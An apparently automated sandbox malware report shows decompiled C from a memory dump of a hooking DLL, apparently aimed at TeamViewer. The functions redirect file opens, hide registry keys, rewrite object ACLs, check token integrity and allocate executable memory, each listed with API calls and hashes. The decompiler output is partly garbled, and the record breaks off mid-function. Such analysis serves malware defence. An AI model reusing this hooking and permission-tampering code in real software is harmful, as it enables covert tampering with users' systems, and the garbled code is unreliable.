                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare_amsg_exit$Sleepfree
                                                                                                                        • String ID: d4o$d4o
                                                                                                                        • API String ID: 1670123637-3031744194
                                                                                                                        • Opcode ID: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction ID: 7b5427e9f727e28c60f6dd4a89875de89a6ae219444777c7c72b2acd756cb66a
                                                                                                                        • Opcode Fuzzy Hash: 0a3efa0dfdfdf4a21f909cbdd09916f0f29e6f10b98879d45571159f0939605d
                                                                                                                        • Instruction Fuzzy Hash: 9E41E6B3A45AE5EBEB20EF648D80B5A33ADAB52375F00452EF904DD1A1CF35A4518B31
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 74%
                                                                                                                        			E6F337C40(signed int __eax, WCHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                                                                        				char _v516;
                                                                                                                        				short _v524;
                                                                                                                        				short _v532;
                                                                                                                        				signed int _t19;
                                                                                                                        				void* _t22;
                                                                                                                        				WCHAR* _t24;
                                                                                                                        				WCHAR* _t27;
                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t35;
                                                                                                                        				short _t40;
                                                                                                                        				intOrPtr _t41;
                                                                                                                        				WCHAR* _t45;
                                                                                                                        				WCHAR* _t48;
                                                                                                                        				short _t50;
                                                                                                                        				WCHAR* _t53;
                                                                                                                        				WCHAR* _t55;
                                                                                                                        
                                                                                                                        				_t19 = __eax;
                                                                                                                        				_t55 = _a4;
                                                                                                                        				if(_t55 == 0) {
                                                                                                                        					L10:
                                                                                                                        					_t22 = CreateFileW(_t55, _a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                        					return _t22;
                                                                                                                        				} else {
                                                                                                                        					if( *_t55 != 0x3a) {
                                                                                                                        						_t53 = PathFindFileNameW(_t55);
                                                                                                                        						_t24 = M6F340528; // 0x9773e8
                                                                                                                        						if(lstrcmpiW(_t55, _t24) == 0) {
                                                                                                                        							_pop(_t53);
                                                                                                                        							_pop(_t55);
                                                                                                                        							_t45 = M6F340534; // 0x98a1a0
                                                                                                                        							_a4 = _t45;
                                                                                                                        							goto M6F3405A4;
                                                                                                                        						}
                                                                                                                        						_t48 = M6F34056C; // 0x77af54
                                                                                                                        						_t19 = lstrcmpiW(_t53, _t48);
                                                                                                                        						if(_t19 == 0) {
                                                                                                                        							goto L2;
                                                                                                                        						} else {
                                                                                                                        							_t27 = M6F340554; // 0x749734
                                                                                                                        							_t19 = StrCmpNIW(_t55, _t27, 0xb);
                                                                                                                        							if(_t19 == 0) {
                                                                                                                        								goto L2;
                                                                                                                        							} else {
                                                                                                                        								if(lstrcmpiW(_t53, L"tv.ini") != 0) {
                                                                                                                        									goto L10;
                                                                                                                        								} else {
                                                                                                                        									_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        									wsprintfW( &_v532, L"%s%s", _t40, _t53);
                                                                                                                        									if(lstrcmpiW( &_v524, _t55) != 0) {
                                                                                                                        										goto L10;
                                                                                                                        									} else {
                                                                                                                        										_t41 = M6F340550; // 0x749736
                                                                                                                        										_t50 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x9953a0
                                                                                                                        										wsprintfW( &_v524, L"%s%s%s", _t50, _t41, L".ini");
                                                                                                                        										_push(_a36);
                                                                                                                        										_push(_a32);
                                                                                                                        										_push(_a28);
                                                                                                                        										_t35 = _a16;
                                                                                                                        										_push(_a24);
                                                                                                                        										_push(_a20);
                                                                                                                        										_push(_t35);
                                                                                                                        										_push( &_v516);
                                                                                                                        										M6F3405A4();
                                                                                                                        										return _t35;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						L2:
                                                                                                                        						return _t19 | 0xffffffff;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}



















                                                                                                                        APIs
                                                                                                                        • PathFindFileNameW.SHLWAPI(?), ref: 6F337C6E
                                                                                                                        • lstrcmpiW.KERNEL32(?,009773E8), ref: 6F337C83
                                                                                                                        • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 6F337D96
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateFindNamePathlstrcmpi
                                                                                                                        • String ID: %s%s$%s%s%s$.ini$tv.ini
                                                                                                                        • API String ID: 3438131021-2591480844
                                                                                                                        • Opcode ID: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction ID: 2ed0c9728fc17fd149b52cc483663096b9a1a927e199fac55dd38c4ecf834b56
                                                                                                                        • Opcode Fuzzy Hash: 2ca70390e2e595a24703f28b25710cd9f95ababb93957c3bfe1f40c835b80e34
                                                                                                                        • Instruction Fuzzy Hash: D331A2B3608651AFD320EBA8DC84EAB73ADEFC9730F10451DF95583240DB35E8158B61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 22%
                                                                                                                        			E6F332000(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                        				char _v40;
                                                                                                                        				char _v48;
                                                                                                                        				void* _v52;
                                                                                                                        				long _v56;
                                                                                                                        				long _v60;
                                                                                                                        				long _v64;
                                                                                                                        				long _v68;
                                                                                                                        				intOrPtr _v72;
                                                                                                                        				intOrPtr _v76;
                                                                                                                        				char _v80;
                                                                                                                        				char _v92;
                                                                                                                        				intOrPtr _v96;
                                                                                                                        				intOrPtr _v108;
                                                                                                                        				intOrPtr _t28;
                                                                                                                        				intOrPtr _t29;
                                                                                                                        				long* _t34;
                                                                                                                        				signed int _t38;
                                                                                                                        				void* _t50;
                                                                                                                        				long _t52;
                                                                                                                        				intOrPtr _t55;
                                                                                                                        
                                                                                                                        				_t28 =  *_a8;
                                                                                                                        				_t52 = 0;
                                                                                                                        				_v48 = 0;
                                                                                                                        				if(_t28 == 0) {
                                                                                                                        					_t29 = _a4;
                                                                                                                        					if(_t29 == 0) {
                                                                                                                        						goto L2;
                                                                                                                        					} else {
                                                                                                                        						_t55 = _a12;
                                                                                                                        						__imp__GetNamedSecurityInfoA(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40); // executed
                                                                                                                        						if(_t29 != 0) {
                                                                                                                        							goto L2;
                                                                                                                        						} else {
                                                                                                                        							goto L5;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        				} else {
                                                                                                                        					_t55 = _a12;
                                                                                                                        					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
                                                                                                                        					if(_t28 == 0) {
                                                                                                                        						L5:
                                                                                                                        						_v68 = 0x44;
                                                                                                                        						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
                                                                                                                        						if(_t50 != 0) {
                                                                                                                        							_t34 =  &_v68;
                                                                                                                        							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
                                                                                                                        							if(_t34 != 0) {
                                                                                                                        								_v76 = 1;
                                                                                                                        								_v80 = 0x10000000;
                                                                                                                        								_v72 = 3;
                                                                                                                        								_v64 = 0;
                                                                                                                        								_v68 = 0;
                                                                                                                        								_v52 = _t50;
                                                                                                                        								_v60 = 0;
                                                                                                                        								_v56 = 0;
                                                                                                                        								__imp__SetEntriesInAclA(1,  &_v80, _v96,  &_v92);
                                                                                                                        								_t38 =  *_v56;
                                                                                                                        								if(_t38 == 0) {
                                                                                                                        									_t38 = _v60;
                                                                                                                        									if(_t38 != 0) {
                                                                                                                        										__imp__SetNamedSecurityInfoA(_t38, _t55, 4, 0, 0, _v108, 0); // executed
                                                                                                                        										goto L11;
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0);
                                                                                                                        									L11:
                                                                                                                        									asm("sbb esi, esi");
                                                                                                                        									_t52 =  ~_t38 + 1;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t50);
                                                                                                                        						}
                                                                                                                        						return _t52;
                                                                                                                        					} else {
                                                                                                                        						L2:
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}
























                                                                                                                        APIs
                                                                                                                        • GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33202D
                                                                                                                        • GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6F33205D
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 6F332074
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F33207B
                                                                                                                        • CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 6F332094
                                                                                                                        • SetEntriesInAclA.ADVAPI32(00000001,?,?,00000044), ref: 6F3320DF
                                                                                                                        • SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,00000044,00000000), ref: 6F3320FB
                                                                                                                        • SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000044,00000000), ref: 6F332117
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F332126
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F33212D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1714474399-2746444292
                                                                                                                        • Opcode ID: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction ID: d811240a3e099263e6a1628e8a8cff13de36a9642bc120c27838345c56475953
                                                                                                                        • Opcode Fuzzy Hash: fd6abdba64809bd2c693e6abda943a493432fb084201ac637837d951c7251a55
                                                                                                                        • Instruction Fuzzy Hash: 354108B2604399AFE710CF54CD88E6BBBBDEB85B98F40481DF641C6140D676EC488B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 68%
                                                                                                                        			E6F333280(void* _a4) {
                                                                                                                        				void _v0;
                                                                                                                        				void* _v16;
                                                                                                                        				void _v72;
                                                                                                                        				long _v76;
                                                                                                                        				long _v80;
                                                                                                                        				long _v84;
                                                                                                                        				void* _v88;
                                                                                                                        				char _v96;
                                                                                                                        				DWORD* _t32;
                                                                                                                        				int _t36;
                                                                                                                        				long _t52;
                                                                                                                        
                                                                                                                        				_t52 = _a4;
                                                                                                                        				_v76 = 0;
                                                                                                                        				_v84 = _t52;
                                                                                                                        				if(_t52 != 0 || OpenProcessToken(0xffffffff, 0xa,  &_v84) != 0) {
                                                                                                                        					_a4 = 0;
                                                                                                                        					_v80 = 0;
                                                                                                                        					if( *0x6f34027c <= 5) {
                                                                                                                        						L7:
                                                                                                                        						DuplicateToken(_v84, 1,  &_a4);
                                                                                                                        						if(_v0 != 0) {
                                                                                                                        							goto L8;
                                                                                                                        						}
                                                                                                                        					} else {
                                                                                                                        						_t36 = GetTokenInformation(_v84, 0x12,  &_v72, 4,  &_v80); // executed
                                                                                                                        						if(_t36 != 0 && _v76 == 3) {
                                                                                                                        							GetTokenInformation(_v88, 0x13,  &_v0, 4,  &_v84);
                                                                                                                        						}
                                                                                                                        						if(_v0 != 0) {
                                                                                                                        							L8:
                                                                                                                        							_t32 =  &_v84;
                                                                                                                        							_v84 = 0x44;
                                                                                                                        							__imp__CreateWellKnownSid(0x1a, 0,  &_v72, _t32);
                                                                                                                        							if(_t32 != 0) {
                                                                                                                        								__imp__CheckTokenMembership(_v16,  &_v88,  &_v96);
                                                                                                                        							}
                                                                                                                        							FindCloseChangeNotification(_v16); // executed
                                                                                                                        						} else {
                                                                                                                        							goto L7;
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					if(_t52 == 0) {
                                                                                                                        						CloseHandle(_v88);
                                                                                                                        					}
                                                                                                                        					return _v80;
                                                                                                                        				} else {
                                                                                                                        					return _v76;
                                                                                                                        				}
                                                                                                                        			}















                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,0000000A,?), ref: 6F3332A1
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 6F3332E9
                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 6F333309
                                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 6F33331F
                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 6F333342
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 6F33335B
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 6F333366
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1214873377-2746444292
                                                                                                                        • Opcode ID: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction ID: 08229b83593daad8b88303d06cb7f4518142c8a9b4845ba5e457421a3d9ed692
                                                                                                                        • Opcode Fuzzy Hash: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction Fuzzy Hash: 323118B2548349AFD710DB54C845FABB7E9BBC4B24F00C90DF5A587280DB75E509CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 63%
                                                                                                                        			E6F338100(long _a4, WCHAR* _a8, signed int _a12, long _a16, signed int _a28, signed int _a32, struct HWND__* _a36, struct HMENU__* _a40, struct HINSTANCE__* _a44, void* _a48) {
                                                                                                                        				short _v520;
                                                                                                                        				signed int _t16;
                                                                                                                        				struct HWND__* _t21;
                                                                                                                        				long _t33;
                                                                                                                        				intOrPtr _t35;
                                                                                                                        				long _t37;
                                                                                                                        				WCHAR* _t38;
                                                                                                                        				int _t41;
                                                                                                                        				struct HWND__* _t53;
                                                                                                                        
                                                                                                                        				_t33 = _a16;
                                                                                                                        				if((_t33 & 0x40000000) == 0 || _t33 < 0) {
                                                                                                                        					_t16 = 1;
                                                                                                                        					_t33 = _t33 & 0xefffffff;
                                                                                                                        					_t37 = 0x8000080;
                                                                                                                        				} else {
                                                                                                                        					_t37 = _a4;
                                                                                                                        					_t16 = 0;
                                                                                                                        				}
                                                                                                                        				asm("sbb eax, eax");
                                                                                                                        				_t21 = CreateWindowExW(_t37, _a8,  !( ~_t16) & _a12, _t33,  ~_a28,  ~_a32, 0, 0, _a36, _a40, _a44, _a48); // executed
                                                                                                                        				_t53 = _t21;
                                                                                                                        				_t41 = GetClassNameW(_t53,  &_v520, 0x103);
                                                                                                                        				if(_t41 <= 0) {
                                                                                                                        					L10:
                                                                                                                        					return _t53;
                                                                                                                        				} else {
                                                                                                                        					_t38 = M6F340560; // 0x77fbf8
                                                                                                                        					if(lstrcmpiW( &_v520, _t38) != 0) {
                                                                                                                        						if(_t41 > 1) {
                                                                                                                        							_t35 = M6F340558; // 0x7982c4
                                                                                                                        							if(lstrcmpiW( &_v520, _t35 + 2) == 0) {
                                                                                                                        								_push(4);
                                                                                                                        								_push(_t53);
                                                                                                                        								 *0x6f34039c = _t53;
                                                                                                                        								M6F3405B8();
                                                                                                                        								_push(0x1a);
                                                                                                                        								_push(1);
                                                                                                                        								_push(1);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								_push(0);
                                                                                                                        								_push(_t53);
                                                                                                                        								M6F3405C4();
                                                                                                                        							}
                                                                                                                        						}
                                                                                                                        						goto L10;
                                                                                                                        					} else {
                                                                                                                        						DestroyWindow(_t53);
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(08000080,?,?,?,?,?,00000000,00000000,?,?,?,?), ref: 6F33817A
                                                                                                                        • GetClassNameW.USER32 ref: 6F33818D
                                                                                                                        • lstrcmpiW.KERNEL32(0077FBF8,0077FBF8), ref: 6F3381AB
                                                                                                                        • DestroyWindow.USER32(00000000), ref: 6F3381B2
                                                                                                                        • lstrcmpiW.KERNEL32(007982C2,007982C2), ref: 6F3381EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Windowlstrcmpi$ClassCreateDestroyName
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2351571968-0
                                                                                                                        • Opcode ID: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction ID: f7c36f7a8f2a3fa451227185245e1935a44bf41670ded956ebe92e91c3711808
                                                                                                                        • Opcode Fuzzy Hash: 0b2de832266c3c3bf70dd8854cec51ade220f0203205bfff281bcd4033c864e7
                                                                                                                        • Instruction Fuzzy Hash: 5E31D273A59761ABE720DA68CC45FEB73ACEB89720F04090DFA55D3180D674A804CBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F337BD0(void* _a4, WCHAR* _a8, int _a12, int _a16, void** _a20) {
                                                                                                                        				long _t7;
                                                                                                                        				WCHAR* _t8;
                                                                                                                        				WCHAR* _t14;
                                                                                                                        
                                                                                                                        				_t14 = _a8;
                                                                                                                        				if(_t14 == 0) {
                                                                                                                        					L3:
                                                                                                                        					_t7 = RegOpenKeyExW(_a4, _t14, _a12, _a16, _a20); // executed
                                                                                                                        					return _t7;
                                                                                                                        				} else {
                                                                                                                        					_t8 = M6F34054C; // 0x78645c
                                                                                                                        					if(StrCmpNIW(_t14, _t8, 0x1c) != 0) {
                                                                                                                        						goto L3;
                                                                                                                        					} else {
                                                                                                                        						return 2;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}







                                                                                                                        APIs
                                                                                                                        • StrCmpNIW.SHLWAPI(?,0078645C,0000001C), ref: 6F337BE2
                                                                                                                        • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 6F337C0A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID: \dx
                                                                                                                        • API String ID: 71445658-3316144491
                                                                                                                        • Opcode ID: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction ID: f5b9657d3a9e03e4d8a76d23d97bd5a12ec788d006bad21c6462854e62da286f
                                                                                                                        • Opcode Fuzzy Hash: 0c7b019ab81fbcb0129a6cf6262eb85926935d472330c8ab3066a30da819fb1d
                                                                                                                        • Instruction Fuzzy Hash: 05E06DB2618660EBD210DE18D844EAB77BCEF99B20F00C90DB95587201C730EC11CBB2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33B4C0() {
                                                                                                                        				void* _t4;
                                                                                                                        				void* _t13;
                                                                                                                        
                                                                                                                        				E6F33B460();
                                                                                                                        				_t13 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
                                                                                                                        				if(_t13 != 0) {
                                                                                                                        					E6F33B4B0();
                                                                                                                        					return 1;
                                                                                                                        				} else {
                                                                                                                        					_t4 = HeapCreate(0, 0, 0); // executed
                                                                                                                        					"ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = _t4;
                                                                                                                        					if(_t4 == 0) {
                                                                                                                        						E6F33B4B0();
                                                                                                                        						return 9;
                                                                                                                        					} else {
                                                                                                                        						E6F33A540(_t4);
                                                                                                                        						E6F33B4B0();
                                                                                                                        						return 0;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B472
                                                                                                                          • Part of subcall function 6F33B460: Sleep.KERNEL32(00000001,00000001,?,00000001,?,?,?,?,?,6F331FE4,00000000,?,?), ref: 6F33B48B
                                                                                                                          • Part of subcall function 6F33B460: InterlockedCompareExchange.KERNEL32(6F340620,00000001,00000000), ref: 6F33B497
                                                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000100,6F338CDE), ref: 6F33B4D3
                                                                                                                          • Part of subcall function 6F33B4B0: InterlockedExchange.KERNEL32(6F340620,00000000), ref: 6F33B4B7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ExchangeInterlocked$Compare$CreateHeapSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1766302375-0
                                                                                                                        • Opcode ID: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction ID: 047d3a78ef540c62b6ab8bdcb2a699144b53fbad22efb848229d2734342f84bf
                                                                                                                        • Opcode Fuzzy Hash: 458e1e2e6c865d59582693fcfbc10f7c7aac249789f366abcdd29742ecd9e20b
                                                                                                                        • Instruction Fuzzy Hash: 2BE04F33F05EB906DA11F7B578006DA65888F4266AB070069EA888A384CF2C884143E9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A590() {
                                                                                                                        				void* _t7;
                                                                                                                        				intOrPtr* _t8;
                                                                                                                        				void _t9;
                                                                                                                        				void* _t11;
                                                                                                                        
                                                                                                                        				_t7 =  *0x6f34095c; // 0x0
                                                                                                                        				if(_t7 == 0) {
                                                                                                                        					L4:
                                                                                                                        					_t7 = VirtualAlloc(0, 0x1000, 0x3000, 0x40); // executed
